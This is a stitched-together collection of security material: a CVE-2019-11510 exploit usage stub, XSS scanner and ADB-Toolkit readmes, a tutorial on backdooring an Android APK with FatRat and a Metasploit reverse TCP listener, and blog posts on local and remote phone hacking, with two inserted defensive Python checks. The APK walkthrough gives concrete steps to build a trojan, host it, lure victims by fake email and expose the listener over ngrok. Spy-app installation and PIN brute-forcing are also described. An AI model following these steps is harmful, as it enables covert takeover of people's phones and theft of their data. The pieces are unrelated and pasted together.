Exploit for Arbitrary File Read on Pulse Secure SSL VPN (CVE-2019-11510)

python usage:

python CVE-2019-11510.py https://x.x.x.x

https://hackerone.com/reports/591295

https://github.com/projectzeroindia/CVE-2019-11510

Powerful XSS scanning and parameter analysis tool and gem

Key features

  • Pattern matching based XSS scanning
  • Detect alert/confirm/prompt events in a headless browser (with Selenium)
  • Testing request/response for XSS protection bypass and reflected params
    • Reflected params
    • Filtered tests: event handlers, HTML tags, special chars, useful code
  • Testing Blind XSS (with XSS Hunter, ezXSS, HBXSS, etc.; any URL-based blind test)
  • Dynamic/static analysis
    • Find SQL error patterns
    • Analysis of security headers (CSP, HSTS, X-Frame-Options, X-XSS-Protection, etc.)
    • Analysis of other headers (Server version, Content-Type, etc.)
  • Scanning from a raw file (Burp Suite, ZAP request)
  • XSpear runs from Ruby code (as a gem library)
  • Show a table-based CLI report and the raw query (URL) for each filtered rule test
  • Testing at selected parameters
  • Supported output formats: cli, json
    • cli: summary, filtered rule (params), raw query
  • Supported verbose levels (quiet / normal / raw data)
  • Support for custom callback code to test various attack vectors
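The header analysis in the feature list can be reproduced as a small standalone check. The following is an added example in Python and is not XSpear's own code (XSpear is a Ruby gem): it grades the defensive headers of one HTTP response the way a scanner or proxy would report them, using two constructed sample responses, one weak and one hardened.

```python
"""Security-header review over captured HTTP responses.

Added example, not XSpear's own code. It reproduces the idea behind the
"analysis of security headers" feature as a check a defender can run over
a response's headers (for instance, headers saved by a scanner or proxy).
Both sample responses below are constructed for the demo.
"""
from typing import Dict, List

ONE_YEAR = 31536000  # seconds; the HSTS max-age most hardening guides recommend


def _csp_directives(csp: str) -> Dict[str, str]:
    """Split a CSP header into {directive-name: full directive text}."""
    out = {}
    for raw in csp.split(";"):
        part = raw.strip()
        if part:
            out[part.split()[0].lower()] = part
    return out


def review_headers(headers: Dict[str, str]) -> List[str]:
    """Return a list of findings for one response; an empty list means clean."""
    # Header names are case-insensitive in HTTP, so normalise before lookup.
    h = {k.lower(): v.strip() for k, v in headers.items()}
    findings = []

    csp = h.get("content-security-policy")
    if csp is None:
        findings.append("missing Content-Security-Policy")
    else:
        directives = _csp_directives(csp)
        # script-src falls back to default-src when absent.
        src = directives.get("script-src") or directives.get("default-src")
        if src is None:
            findings.append("CSP has neither script-src nor default-src")
        elif "'unsafe-inline'" in src or "*" in src.split():
            findings.append("CSP allows inline or wildcard scripts: " + src)

    hsts = h.get("strict-transport-security")
    if hsts is None:
        findings.append("missing Strict-Transport-Security")
    else:
        max_age = 0
        for part in hsts.split(";"):
            part = part.strip().lower()
            if part.startswith("max-age="):
                try:
                    max_age = int(part[len("max-age="):])
                except ValueError:
                    pass
        if max_age < ONE_YEAR:
            findings.append(f"HSTS max-age too short ({max_age}s)")

    # Clickjacking: either the header or the CSP frame-ancestors directive will do.
    xfo = h.get("x-frame-options")
    if xfo is None and not (csp and "frame-ancestors" in csp):
        findings.append("missing X-Frame-Options / CSP frame-ancestors (clickjacking)")
    elif xfo is not None and xfo.upper() not in ("DENY", "SAMEORIGIN"):
        findings.append("X-Frame-Options has an unsupported value: " + xfo)

    if h.get("x-content-type-options", "").lower() != "nosniff":
        findings.append("missing X-Content-Type-Options: nosniff")

    ctype = h.get("content-type", "")
    if "text/html" in ctype and "charset=" not in ctype.lower():
        findings.append("Content-Type lacks an explicit charset")

    return findings


# Constructed sample responses (not captured from any real host).
WEAK_RESPONSE = {
    "Server": "Apache/2.4.41",
    "Content-Type": "text/html",
    "X-Frame-Options": "ALLOW-FROM https://example.invalid",
    "Content-Security-Policy": "default-src 'self' 'unsafe-inline'",
}

HARDENED_RESPONSE = {
    "Content-Type": "text/html; charset=utf-8",
    "Content-Security-Policy": "default-src 'self'; script-src 'self' 'nonce-abc123'; frame-ancestors 'none'",
    "Strict-Transport-Security": "max-age=63072000; includeSubDomains",
    "X-Content-Type-Options": "nosniff",
    "X-Frame-Options": "DENY",
}

if __name__ == "__main__":
    for name, hdrs in (("weak", WEAK_RESPONSE), ("hardened", HARDENED_RESPONSE)):
        print(name, review_headers(hdrs) or ["no findings"])
```

Run the file directly to print the findings for both samples; in practice the headers would come from a saved proxy or scanner response. The weak sample trips five checks, among them the CSP 'unsafe-inline' allowance, which is the one that matters most for reflected XSS because it lets injected inline script run even with a policy in place.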

Installation

Install it yourself as:

$ gem install XSpear

Or install it yourself as (local file):

$ gem install XSpear-{version}.gem

Add this line to your application’s Gemfile:

gem 'XSpear'

And then execute:

$ bundle

Dependency gems

colorize, selenium-webdriver, terminal-table

If these gems were supposed to be installed automatically with the XSpear gem but the tool behaves abnormally, install them with the following commands.

$ gem install colorize
$ gem install selenium-webdriver
$ gem install terminal-table

Usage on cli

Usage: xspear -u [target] -[options] [value]
[ e.g ]
$ xspear -u 'https://www.hahwul.com/?q=123' --cookie='role=admin'

[ Options ]
    -u, --url=target_URL             [required] Target Url
    -d, --data=POST Body             [optional] POST Method Body data
        --headers=HEADERS            [optional] Add HTTP Headers
        --cookie=COOKIE              [optional] Add Cookie
        --raw=FILENAME               [optional] Load raw file(e.g raw_sample.txt)
    -p, --param=PARAM                [optional] Test paramters
    -b, --BLIND=URL                  [optional] Add vector of Blind XSS
                                      + with XSS Hunter, ezXSS, HBXSS, etc...
                                      + e.g : -b https://hahwul.xss.ht
    -t, --threads=NUMBER             [optional] thread , default: 10
    -o, --output=FILENAME            [optional] Save JSON Result
    -v, --verbose=1~3                [optional] Show log depth
                                      + Default value: 2
                                      + v=1 : quite mode
                                      + v=2 : show scanning log
                                      + v=3 : show detail log(req/res)
    -h, --help                       Prints this help
        --version                    Show XSpear version
        --update                     Show how to update

Result types

  • (I)NFO: Get information (e.g. SQL error, filtered rule, reflected params, etc.)
  • (V)UNL: Vulnerable XSS, checked alert/prompt/confirm with Selenium
  • (L)OW: Low level issue
  • (M)EDIUM: Medium level issue
  • (H)IGH: High level issue

Case by Case

Scanning XSS

$ xspear -u "http://testphp.vulnweb.com/search.php?test=query" -d "searchFor=yy"

JSON output (with quiet mode)

$ xspear -u "http://testphp.vulnweb.com/search.php?test=query" -d "searchFor=yy" -o json -v 1

detail log

$ xspear -u "http://testphp.vulnweb.com/search.php?test=query" -d "searchFor=yy" -v 3

set thread

$ xspear -u "http://testphp.vulnweb.com/search.php?test=query" -t 30

testing at selected parameters

$ xspear -u "http://testphp.vulnweb.com/search.php?test=query&cat=123&ppl=1fhhahwul" -p cat,test

https://github.com/hahwul/XSpear

ADB-Toolkit is a Bash script with 28 options plus a Metasploit section with 6 further options, made to make penetration testing of an Android device easy.


METASPLOIT SECTION :- This section consists of scripts related to Metasploit payloads: you can create a payload, install it and launch it without even touching the phone, and you know the power of Metasploit.

Version 2 Changelog

Added Metasploit Section

Added 7 more options :-
1. COPY ALL DEVICE STORAGE
2. COPY A SPECIFIED FILE OR FOLDER
3. PUT A FILE IN VICTIMS DEVICE 
4. LAUNCH AN APPLICATION
5. CHECK IS PHONE ROOTED OR NOT
6. HANG THE PHONE ( Rooted Phone )
7. SEND SMS FROM THE PHONE

Fixed the remote connection not being established
Made the script executable from anywhere in the shell

Note

Before using this tool you must enable USB debugging in the Developer options of the Android settings; then you are good to go.

Installation

git clone https://github.com/ASHWIN990/ADB-Toolkit.git

cd ADB-Toolkit

sudo chmod +x install.sh

sudo ./install.sh

or

sudo bash install.sh

Usage

sudo ./ADB-Toolkit.sh 

or you can do

sudo bash ADB-Toolkit.sh

or you can also do

sudo adb-toolkit

https://github.com/ASHWIN990/ADB-Toolkit

We have to make one point: mobile applications are a HUGE market today. Many entrepreneurs have left web-based experiences behind to build disruptive mobile solutions. The smartphone battle today remains between iOS and Android. Both have pros and cons, and both ship with default security settings that may not be ideal for non-experienced people.

This writing demonstrates a practical and simple example of how to generate a reverse TCP backdoor in an existing APK file.

This is a pretty common “Social Engineering Attack”, and it’s focused on establishing a reverse TCP connection, through which the attacker can easily get shell access to your Android phone while you are using the infected application, do some harmful stuff, or access your private information without you noticing.

And I call it a “Social Engineering Attack” because of the way it propagates; I’ll explain shortly what the typical phases of these attacks are.

This demo was created in a controlled, local lab, but it can be done on WAN networks easily.

Social Engineering (in simple words)

To explain the concept clearly, we can split the term into two elements: Social refers to our personal and professional lives, and Engineering refers to performing tasks by following certain steps to achieve targets. Combine the two.

Social Engineering is a term that describes a non-technical intrusion that relies heavily on human interaction, tricking people into breaking normal security procedures.

It’s pretty simple, really. It’s all about tricking people into using or downloading malware and then taking advantage of it for malicious purposes.

Social Engineering Phases

The attack can be summarized something like this:

  1. Research: try to gather information about the target, collected from various resources (dumpster diving, website, docs, interactions).
  2. Hook: make the initial move by trying to start a conversation with the selected target after completing the research phase.
  3. Play: make the relationship stronger and continue the dialog to exploit the relationship and get the desired information.
  4. Exit: walk away from the attack scene or stop the communication with the target without creating a scene or doing anything suspicious.

The working lab

A virtualized Kali Linux 2018.4 64 bits on Oracle Virtualbox.

Samsung Galaxy S6 with Android 4.4 Kitkat with some regular security configurations.

Both machines were connected on the same LAN Network.

Tools

The key tool for this workshop is the FatRat exploitation tool. This program is written in Python and can easily generate backdoors in any existing Android application (or for almost any other device) using known payloads from the Metasploit Framework (and other payloads as well). This tool can do a lot of other things; you can check the tool’s GitHub page here.

The installation process is quite simple; just keep in mind that it can take some time because of the dependencies it installs.

Important: update and upgrade your Kali repositories before installing it; this can save you time.

Great, let’s install FatRat:

  1. Clone the repository from GitHub:
     git clone https://github.com/Screetsec/TheFatRat.git
  2. Inside the cloned repository, change the permissions on the setup.sh file to make it executable, then run it:
     cd TheFatRat && chmod +x setup.sh && ./setup.sh
  3. Follow the instructions

On the other side, we have the Metasploit Framework, an open-source penetration testing tool used for developing and executing exploit code against remote target machines. It can be used to test the vulnerabilities of computer systems in order to protect them; on the other hand, it can also be used to break into remote systems.

This amazing tool is already installed on the Kali Linux OS.

Let’s pause a bit.

At this moment (if this is your first time hearing about the Metasploit Framework) I need to go deeper into this explanation, because there are some key terms that may be a little confusing. I previously said that this tool is used to test vulnerabilities, right? A vulnerability is a weakness that can compromise the security of a system.

This vulnerability is abused by using an exploit: software code which allows an attacker to take advantage of a vulnerability.

And finally, when the vulnerability is exploited, the payload acts; this means we run some code on the target system so that the exploitation persists over time.

With all that said. Let’s work.

Hands-on

In this example, I downloaded the Flappy Bird APK from here.

This is the authentic APK game.

I renamed the downloaded file to a simple flappybird.apk and moved it from the downloads directory to a custom folder named backdooring-android (this is optional).

Using FatRat

When I was installing FatRat on my Kali, the installer asked if I wanted to set the fatrat command globally; I said yes. This may differ in your process.

  1. By typing fatrat, the system will evaluate and configure the necessary and available services
  2. Type 5, for Backdooring Original apk [Instagram, Line, etc]
  3. Set up the Local Host (LHOST) and Local Port (LPORT). These represent the host machine’s IP address (Kali) and any unused port for receiving the TCP session handshake (I’ll explain this later)
  4. Now type the location path of flappybird.apk; in my case it is /root/backdooring-android/flappybird.apk
  5. Set up the payload (Metasploit term) for the reverse TCP. Select option 3: android/meterpreter/reverse_tcp
  6. Select 1: Use Backdoor-apk 0.2.2; this is the tool for creating the infected APK

And that’s it. Meanwhile, FatRat will decompile the original APK and, after some internal processing, will generate a new infected APK with the default name app_backdoor.apk

After this, when asked whether to generate the listener, we answer no; we are going to create it manually using the Metasploit Framework.

Creating the listener manually

The second part of this attack consists of setting the host machine (Kali) as the listener for the bidirectional TCP connection; that’s the main purpose of a reverse TCP shell attack through social engineering. The attacker will have shell access to the Android device without the user noticing.

Let’s start by running the msfconsole command

> msfconsole

After this, we set the multi/handler exploit like this

> use multi/handler

Later, setting the payload (the same on the FatRat process)

> set PAYLOAD android/meterpreter/reverse_tcp
> set LHOST [the same as your Kali IP]
> set LPORT [the same as in the FatRat process]

> exploit (running)

Checking the Apache service status (it’s already installed)

systemctl status apache2

Starting the service

systemctl start apache2

Placing the infected backdoor (renamed or not) where the victims can fetch it: the /var/www/html/ directory

Concluding

In this LAN environment, the attacker needs to expose the new infected APK on the Apache server to the victim, by sending a fake email with the link or any other way of tricking people into downloading the new “FlappyBird.apk” onto their Android device.

Once the victim downloads the application and opens it, a new session is created on the listener, using the meterpreter (payload) shell.

The attacker now has complete access to the target for custom attacks or some privilege escalation from the CLI.

You can list the sessions, like:

And you can also select and interact with an active session using the -i flag

> sessions -i 1

You can download my infected FlappyBird.apk file here

I’m not entirely sure whether giving your Kali machine a static IP address, as I did, is required for this malware to work correctly. But for reference, my working IP address was the class C address 192.168.2.120 and the port was 4444.

From LAN to WAN

A simple way of exposing a local IP address is to use a simple tunneling tool called ngrok. This tool makes a plain 127.0.0.1 service reachable from the public internet.

Check the docs for installation steps and auth token setup.

After that, you can run the ngrok command for TCP connections, like:

ngrok tcp 1234 (a TCP tunnel for local port 1234)

The whole process is the same, but you will need to replace the LHOST (the host shown in ngrok’s web interface) and LPORT (the port from the ngrok TCP connection) with the values that ngrok provided to you.

Tips for preventing

  1. Keep your Android device up to date (patches and OS version)
  2. NEVER download any .apk from non-trusted sources
  3. Always check the URL for intentional misspelled domain names
  4. Educate yourself
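The tips above are for the device owner. Whoever runs the network has one more handle: the infected APK’s only observable behaviour is the reverse TCP session to LHOST:LPORT described earlier, and a reverse-connect payload keeps retrying that connection while its handler is down. The following is an added example in Python, not part of the article nor of FatRat or Metasploit. It assumes a constructed flow-log format (one connection per line: timestamp, source, destination, destination port, duration, bytes out) and constructed addresses; the 192.168.2.120:4444 pair is the article’s own lab listener, and 192.168.2.10:22 is a hypothetical known SSH host used to show the allow-list.

```python
"""Flow-log detection for a reverse TCP session from a mobile device.

Added example, not from the article or from any tool it names. The flow-log
format and all addresses are constructed for the demo; 192.168.2.120:4444 is
the article's lab listener. Two behaviours are scored per (src, dst, port):
a long-lived outbound session to a non-standard port, and rapid repeated
connection attempts, which is what a reverse-connect payload does while its
handler is not yet listening.
"""
from collections import defaultdict
from dataclasses import dataclass
from typing import List


@dataclass
class Flow:
    ts: int          # epoch seconds when the connection was opened
    src: str
    dst: str
    dport: int
    duration: int    # seconds the connection stayed open
    bytes_out: int


# Constructed log lines: "<ts> <src> <dst> <dport> <duration> <bytes_out>"
SAMPLE_LOG = """\
1700000000 192.168.2.50 142.250.74.46 443 12 5120
1700000003 192.168.2.50 192.168.2.120 4444 0 0
1700000008 192.168.2.50 192.168.2.120 4444 0 0
1700000013 192.168.2.50 192.168.2.120 4444 0 0
1700000018 192.168.2.50 192.168.2.120 4444 3600 812000
1700000020 192.168.2.51 142.250.74.46 443 8 2048
1700000030 192.168.2.51 192.168.2.10 22 7200 40000
"""

# Ports a phone legitimately talks to all day: web, DNS, NTP, mail, Google push.
COMMON_PORTS = {80, 443, 53, 123, 993, 995, 587, 465, 5228}
LONG_SESSION = 600   # seconds; an interactive shell stays up far longer than an API call
RETRY_WINDOW = 30    # seconds
RETRY_COUNT = 3      # connection attempts inside the window that look like a beacon


def parse_flows(text: str) -> List[Flow]:
    """Parse the constructed flow-log format into Flow records."""
    flows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, dst, dport, duration, bytes_out = line.split()
        flows.append(Flow(int(ts), src, dst, int(dport), int(duration), int(bytes_out)))
    return flows


def detect_reverse_sessions(flows: List[Flow], known_servers=frozenset()) -> List[str]:
    """Return one alert string per suspicious (src, dst, dport) triple.

    known_servers is an allow-list of (dst, dport) pairs, e.g. an admin SSH host,
    so that legitimate long-lived sessions on unusual ports do not alert.
    """
    by_triple = defaultdict(list)
    for f in flows:
        if f.dport in COMMON_PORTS or (f.dst, f.dport) in known_servers:
            continue
        by_triple[(f.src, f.dst, f.dport)].append(f)

    alerts = []
    for (src, dst, dport), fl in sorted(by_triple.items()):
        fl.sort(key=lambda f: f.ts)
        reasons = []
        longest = max(f.duration for f in fl)
        if longest >= LONG_SESSION:
            reasons.append(f"session held open {longest}s")
        # Sliding window over connection start times to catch retry bursts.
        for i in range(len(fl)):
            j = i
            while j < len(fl) and fl[j].ts - fl[i].ts <= RETRY_WINDOW:
                j += 1
            if j - i >= RETRY_COUNT:
                reasons.append(f"{j - i} connects within {RETRY_WINDOW}s")
                break
        if reasons:
            alerts.append(f"{src} -> {dst}:{dport}: " + "; ".join(reasons))
    return alerts


if __name__ == "__main__":
    for alert in detect_reverse_sessions(parse_flows(SAMPLE_LOG),
                                         known_servers=frozenset({("192.168.2.10", 22)})):
        print(alert)
```

On the sample log the phone at 192.168.2.50 alerts on both counts: three failed connects within 15 seconds followed by an hour-long session to port 4444. The SSH session from 192.168.2.51 is silent only because its destination is allow-listed; without the allow-list it would trigger the long-session rule, which is the usual tuning step when deploying a check like this.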

In the previous blog post we talked about how your phone can get hacked via a local attack, i.e. when the phone is in the attacker’s hand. In this blog post we will see how your phone can get hacked remotely, meaning the attacker accesses it from a distance.

As we already mentioned, “hacking” a phone means accessing the content of your phone. That includes seeing what’s happening on your screen and your camera, listening to your microphone,… as well as having control of the phone. Taking control of the phone means keeping control and having constant access to it.

Remote attacks

To hack a phone remotely, you first need to understand what a digital weapon is.

Exploits

We have what we call exploits: bugs that can be turned into something that lets the attacker run a program. For example, suppose a system has a bug, e.g. I know your phone will crash if I send you the message “1,2,3”. I append my program to this “1,2,3” message, and it gets launched once the phone crashes. You’ll receive the message, your phone will read “1,2,3” and crash, and then it will launch the program I sent via this SMS. Here’s an example of this type of exploit.

Exploits can be local or remote. They always come from a bug. The bug allows you to send a command, and sometimes an entire program. In some cases the hacker can decide to keep “persistent” access by installing a spy program on the device after having performed the attack. From there the attacker takes control of the phone.

There are two types of exploits:

1) Exploits that are known publicly. After the exploit is made known to the authors of the affected software, the security vulnerability is fixed and the exploit becomes unusable. So in order to protect yourself from publicly known exploits, you need to update your phone appropriately.

2) “Zero days”: exploits that aren’t made public, meaning people aren’t aware of these security vulnerabilities, except for the ones who found them. A zero day is a security flaw that has not yet been patched (i.e. “fixed”) by the vendor and can be exploited and turned into a powerful weapon. So when you have a zero day, you can basically hack the whole range of devices this bug allows you to exploit. Why aren’t these bugs published directly? Because the entity that found the exploit has a particular interest in not making it public in order to keep hacking; whether it’s criminals, governments,… Indeed, if they publish the exploit, they won’t be able to hack anymore. Zero days can be found on the black market.

Finding exploits is a job, there are competitions for this. They can be sold at a very high price on the market, e.g. remote exploits for iPhone can be sold for millions. According to this article, “Apple now offers up to $1 million to security researchers who discover iOS vulnerabilities and report them, but these bugs are often way more valuable to sell on the black market”.

The more widely applicable the exploit is, the more you’ll be able to sell it for.

Then, there are also backdoors: you can see a “backdoor” as a hidden door, something the attacker voluntarily implemented inside the app so that they can connect to it. It’s essentially introducing a bug. For example, you modify iOS so that it bugs in a specific way. When you introduce a backdoor, it basically becomes your own zero day. If done well, it is very difficult for anyone to notice that there is one implemented.

It is extremely complicated to protect yourself from zero days; however, you can protect yourself from public exploits, as they have been corrected by updates. But bear in mind that this still means you are vulnerable, in that you need to make sure your phone is updated appropriately. You cannot always count on your provider to ensure your security with updates. Take the Android market, for example, where close to 90% of Android makers don’t provide updates, meaning a lot of phones become obsolete quickly, as they provide updates for a duration of 6 months. After this time, they can’t promise you security anymore (some fascinating sources on Android security: here, here, and here). If you want security you need to buy again. Most Android exploits are publicly available. That means I can go on a website, download the exploits and hack more than half of Androids!

If you want to make sure you get the updates, it’d be recommended to buy either an iPhone or a Google phone (and the security you get from them only lasts for a set period of time, until they stop providing updates). If you really want to optimise security with a smartphone, go for an iPhone and renew the phone every two years (the iPhone is better than Android/Google in terms of privacy). It won’t protect you from zero days, but you’ll still considerably increase your security.

What kind of attacks?

Non-targeted attacks: These have a broad target; they attack whoever has security flaws and use these to access a very large number of devices. They exploit either a weakness in software or in an organization’s defenses. Examples include the recent Android-WhatsApp scandal, where hackers exploited an Android vulnerability and injected spyware onto phones via the WhatsApp voice calling function, giving them full remote access to the devices and allowing them to read messages, see contacts and activate the camera. The spyware would be installed even if the call was not picked up!

Targeted attacks: These are attacks on a specific target, to achieve a specific objective. For example, it is the case of Pegasus, a spyware that can be installed on devices running certain versions of iOS. Pegasus exploited some iOS security vulnerabilities in order to take control of the devices of a specific group of activists. The software can basically do anything that users can do, including read text messages, turn on the camera and microphone, add and remove files, and manipulate data. If interested, here’s an article on it.

Targeted attacks require intelligent planning, which also means effort, time and money, in which case the attacker has determined that the “reward” is worth the effort. It can involve months of observation in order to collect maximum info and then design the attack.

Some of these attacks can even be physical, e.g. by using voltmeter lasers (devices that measure the voltage in cables) that give the measurement from distance and recover passwords from the keyboard’s cable. I can do it from the opposite building of your flat. By measuring the voltage in your cable, the voltmeter will determine which button was pressed. I can also film what happens on your keyboard from the opposite building, in which case I just need to find a good angle.

I could also attack the local network. I can hack your Wi-Fi when I’m nearby, or your router from a distance. Routers are not updated; 83% of them are vulnerable, and once I take control of the router this allows me to access your devices from your local network. Here’s an interesting paper on the security of routers.

There are a lot of ways to hack a smartphone; it depends on which digital weapon you have. Each weapon has particular characteristics. Some will allow you to hack from far away, others only from very close. Hacking is about being ingenious enough to combine the different tools at your disposal in order to create an effective attack.

You can protect yourself from non-targeted attacks by updating your devices when fixes are available. However, protecting yourself from a targeted attack is more complicated. If the attacker is high level, depending on how extreme his actions are, the truth is he will eventually get access to the device. Nevertheless, you can still take appropriate measures to increase your security, as we have also seen in our previous blog post.

The introduction of the smartphone to the world has been an incredible gift for hackers. The gathering of info on this device, the fact that it’s always with you, and the simplicity of hacking it makes it a goldmine.

Author: @louismetz

How can I hack your phone? And what can you do to protect yourself from an attack?

First, let’s define the terms: what does “hacking” a phone mean? Put simply, it means to access the content of your phone, i.e. the material and the info that’s inside. That includes seeing what’s happening on your screen and your camera, listening to your microphone,…

An attack always comes down to the same thing: it is about accessing the content to the phone. And then, depending on the attacker’s intent, to take control of the phone as well. Taking control of the phone means keeping control and having a constant access to the phone (meaning it’s more than just reading the info).


1) How can I hack your phone?
2) What can I install on your phone to keep control of it?
3) What you can do to prevent your phone from being hacked…


How can I hack your phone?

Let’s differentiate two types of “attacks”: Local Attacks (I hack your phone with your phone in my hand) and Remote Attacks (I hack your phone from a distance).

In this blogpost, we will talk about local attacks. Stay tuned for next week’s blogpost where we’ll approach remote attacks.

Local attack: “If I can touch your device, it’s mine”.

A local attack on your phone means I access it via physical contact. I can either just connect to your phone, read what’s in there and then leave without touching anything inside. In that case, I just took the info and that’s it. I can also go for a more extreme attack, where I install a “spy” (an app) and take control of the device. That essentially means that at any given point after I hack the phone, I can always reconnect and see what you’re up to.

Practically speaking, how can I hack your phone via a local attack?

  1. Breaking your pin code
  2. Accessing your phone for 5 min

1) Breaking your 4-digit pin code

One of the first things I’ll do to attack your phone is look out for your 4-digit PIN, since it’s something you’ll always end up using, and therefore my seeing you in action is just a question of time. Even though it’s becoming more challenging with fingerprint and Face ID access, there will always be moments where you will use this PIN or pattern (depending on whether you have an iPhone or an Android), which are essentially the same: a simple combination of four numbers. Face ID or biometric access can fail for whatever reason in the moment, and you’d usually resort to your PIN code or pattern. I just need to be patient. I can also provoke you into having to enter your PIN by blocking your phone. All I have to do is “fail” to unlock it multiple times, until it gets blocked and asks you for your PIN. At this moment you will need to manually enter your passcode. And I shall be watching.

You might think it isn’t this easy to get physical access to someone’s phone. Well, isn’t it, though? “Hey, can I use your phone to check something?” “May I use your phone to send a message to my girlfriend? My phone ran out of battery.” “May I put another song on?”. To which you may most probably reply “Sure, go for it!”.

In one of our previous blogposts we mentioned how easy it is for a hacker to access someone else’s phone physically (last paragraph). And all this is even considering everyone has a pincode on. How many of your friends actually have no password, no barriers whatsoever that protects the access to the content of their phone?

The moment I have your pin, I have access to everything. I can download anything and that’s it: I have now full control over your phone.

Now, let’s say I don’t have your pin, but still have physical access to your phone. What can I do to hack it? I can still find another way…

2) Accessing your phone for 5 min

5 min, that’s all I need. Whether it’s while you’re having a shower, or working out at the gym.

Let’s consider that, for whatever reason, I haven’t been able to break your PIN code. In that case, here’s what I’ll do: once I have your phone in my hand, I’ll turn it off and turn it back on while loading an app at startup. This gives me a kind of developer mode where I have access to the phone as if it was a USB key. Once it’s on, what I’m looking for is the decryption key, which is protected by your PIN. If your PIN is 4 digits long, that basically means the decryption key I want access to is protected by a 4-digit code. And this is very easily breakable. In fact it could be done in about 30 seconds!

Concretely speaking, what do I do? I plug the phone into my computer, I start it in DFU (Device Firmware Upgrade) mode, I load an app onto it which gives me access to your phone’s memory just as if it was a USB drive. I now have your files, but they’re encrypted. They’re encrypted with a key. A key protected by a 4-digit code.

From 0000 to 9999 : these are all the possible combinations, and for a computer this only takes a few seconds to break.

What I’ll do here is break this pin by testing all the possible combinations with a brute-force app (easily available on the internet). Once I’ve found the correct combination, job done! I simply unlock the phone, and I can read your files. Which means I have access to all your passwords, email, WhatsApp, Facebook, etc.

It’s a common technique used by hackers, as well as the police. In fact, some hackers steal phones in order to resell them by unlocking them. They gain physical access to it, plug it to their computer using an app to read it just like a USB mode, then unlock the phone to resell it.

Hence the importance for a solid pin code, as this is what encrypts your device. Instead of a 4-digit code, use a long passcode.


What can I install on your phone to keep control of it?

My goal here will be to download “spy” apps in order to keep control of your phone even after it’s no longer in my hands and after you get it back. What types of apps?

There are illegal spy apps I can install: I can have an app preloaded on a website, enter the website address, download the app directly and that’s it.

But I can also install spy apps that are actually legal! Take the example of mspy, an “Ultimate monitoring software for parental control”. Installing this app enables me to snoop on your WhatsApp, Snapchat, Facebook, text messages, calls, location, etc. I can pretty much monitor and control anything I want. It’s that easy!

I don’t have to go through the App Store to download an app, which means I don’t even need to know your Apple ID.

Another technique is adding a root certificate. A root certificate basically tells your phone that you are connected to a secure website. That’s when that little padlock appears (you can probably see it at the top of your screen right now). Some authorities determine which secure connections are valid and which aren’t, which means that when the padlock appears, that secure connection has been validated by one certificate authority. They’re automatically preloaded in your phone. However, I can add one myself on your phone: I just need your access code, and then I can intercept all your secure communications and read everything you’re doing. (Yes, HTTPS and the little padlock appearing in your address bar doesn’t necessarily mean your connection is safe!)

Once I’ve installed a spy on your phone, it is very difficult for you to notice it: you either need to apply forensic techniques (techniques used by the police) to analyse what’s on your phone, or you need to intercept the connections of your phone. Either way, you need to be an expert to be able to do this.

That is why it is important to use preventive measures to avoid an attack.


What YOU can do to prevent your phone from being hacked…

Measures that you can take to avoid a local attack:

1) Use a longer passcode with an alphanumeric keyboard and biometric access instead of a 4-digit PIN code or a pattern. Breaking a long alphanumeric passphrase by observing you typing it, or even with a brute-force app, is extremely complicated. (To set a longer numeric or alphanumeric code, go to Settings > Touch ID & Passcode > Change Passcode.) You can already considerably increase your protection by using a long passcode together with biometric access.

2) Enable the parental control access: Block your settings with the enablement of parental control which gives you another password. Indeed the parental control limits an attacker’s access to some configurations as it means they have to enter a second password on top of the passcode. Even if they manage to unlock your phone, they won’t be able to install something as they’ll need to go to your settings to do that, and with the parental control it’ll ask them for another code which they don’t have. (Please note: the parental control is not enabled by default, you need to activate it. To do so, go to Settings and tap Screen Time. You can then enter a passcode and configure Content & Privacy Restrictions as you see fit).

Parental control access is an added layer of protection only useful in “live”, that is whenever I have physical access to your phone in the moment, as it will prevent me from changing the settings. However it is not useful if I take your phone and plug it to my computer in USB mode (as mentioned above), as I’ll have access to the entire system in that case, which will allow me to do more things, including having access to the passwords.

Nonetheless, by using a long passcode and enabling parental control access, you are already being far more secure and protected.

3) Don’t make it easy for anyone to touch your phone. You shouldn’t easily give your phone to people. Your phone stores a lot of confidential information that you do not want to get out. That includes your passwords, email, bank account logins, social media access, etc. Treat it accordingly. Similarly, avoid leaving your phone in places where someone could easily get hold of it.

4) Not much else you can do, except not having a smartphone (which can be an option!).

The real challenge of a local attack, since it’s “physical”, is that the attacker needs to touch the device. He must be capable of accessing it physically, which isn’t always easy. However, technically speaking, it is easier than a remote attack.
